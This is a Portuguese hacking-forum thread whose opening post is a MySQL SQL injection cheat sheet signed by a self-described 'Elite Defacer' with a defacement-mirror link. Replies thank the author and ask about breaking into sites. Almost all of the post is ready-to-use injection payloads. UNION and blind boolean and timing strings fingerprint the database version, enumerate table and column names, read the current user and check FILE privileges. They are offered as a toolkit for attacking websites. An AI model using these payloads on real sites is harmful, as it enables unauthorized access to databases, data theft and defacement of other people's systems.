Tabelas MYSQL

$cr34m()

Membro

Registrado em: Nov 2009
Posts: 76

Font Size

Tutorial Tabelas MYSQL

19-03-2010, 16:06

Tablelas MySQL

Obtendpotabela de nomes e nomes de coluna a partir do MySQL

Código:

0' UNION SELECT version(),null /*
0' UNION SELECT @@version,null /*
1' AND MID(version(),1,1) like '4
1' UNION SELECT (if(mid(version(),1,1) like 4, benchmark(100000,sha1(’test’)), ‘false’)),null /*
Ler a tabela information_schema (versão> = 5,0)

Obter tablenames

Código:

0' UNION SELECT table_name,null FROM information_schema.tables WHERE version = '9

Obter columnnames

Código:

0' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name = 'tablename

Obter tudo num só

Código:

0' UNION SELECT column_name,table_name FROM information_schema.columns /*
Read information_schema table blindly (version >= 5.0)

Obter 1ª tablename

Código:

1' AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),1,1) > 'm
1' AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 1),2,1) > 'm

Obter próxima tablename

Código:

1' AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 2,1),1,1) > 'm
1' AND MID((SELECT table_name FROM information_schema.tables WHERE version = 9 LIMIT 2,1),2,1) > 'm

Obter 1ª columnname (da tabela "tablename")

Código:

1' AND MID((SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename' LIMIT 1),1,1) > 'm
1' AND MID((SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename' LIMIT 1),2,1) > 'm

Obter próxima columnname (da tabela "tablename")

Código:

1' AND MID((SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename' LIMIT 2,1),1,1) > 'm
1' AND MID((SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename' LIMIT 2,1),2,1) > 'm

Usar funções de ficheiros (FILE privilégio requerido)

Obter current user

Código:

0' UNION SELECT current_user,null /*
0' UNION SELECT user(),null /*
1' AND user() LIKE 'root
1' AND MID((user()),1,1)>’m

verificar FILE priv8 (para o utilizador "username")

Para MySQL 4:

Código:

0' UNION SELECT file_priv,null FROM mysql.user WHERE user = 'username
1' AND MID((SELECT file_priv FROM mysql.user WHERE user = 'username'),1,1) = 'Y

Para MySQL 5:

Código:

0' UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%
1' AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'),1,1)='Y

<%
/* Elite Defacer */
$cr34m() - #3xpl0it - h4ck3r4lp R4vn0s - 5ubz3r0
%>

************, Nós Te Amamos ♥
http://zone-h.org/mirror/id/10342631

Tags: Nenhum(a)

maxximus

Membro

Registrado em: Mar 2010

Posts: 73
- Share
- Tweet
Font Size

#2

19-03-2010, 16:28

muito bom $cr34m() ta de

mais me tira um duvida.... se a versão do MySql do site for 4 da pra entrar sem ser por brute force ??

vlw, novamente.... otimo topico !

sigpic
Top
Comment
DJ Thiago

Membro

Registrado em: Jan 2010

Posts: 410
- Share
- Tweet
Font Size

#3

19-03-2010, 16:35

Muito bom vlw por compartilhar vou salvar aki

Rádio Guia do Hacker
Top
Comment
L0RD_R3D

Membro

Registrado em: Mar 2010

Posts: 21
- Share
- Tweet
Font Size

#4

23-03-2010, 12:23

Oi,

Realmente isso e muito bom, eu estava precisando vlw
Top
Comment

Unconfigured Ad Widget

Anúncio

Tutorial Tabelas MYSQL

Comment

Comment

Comment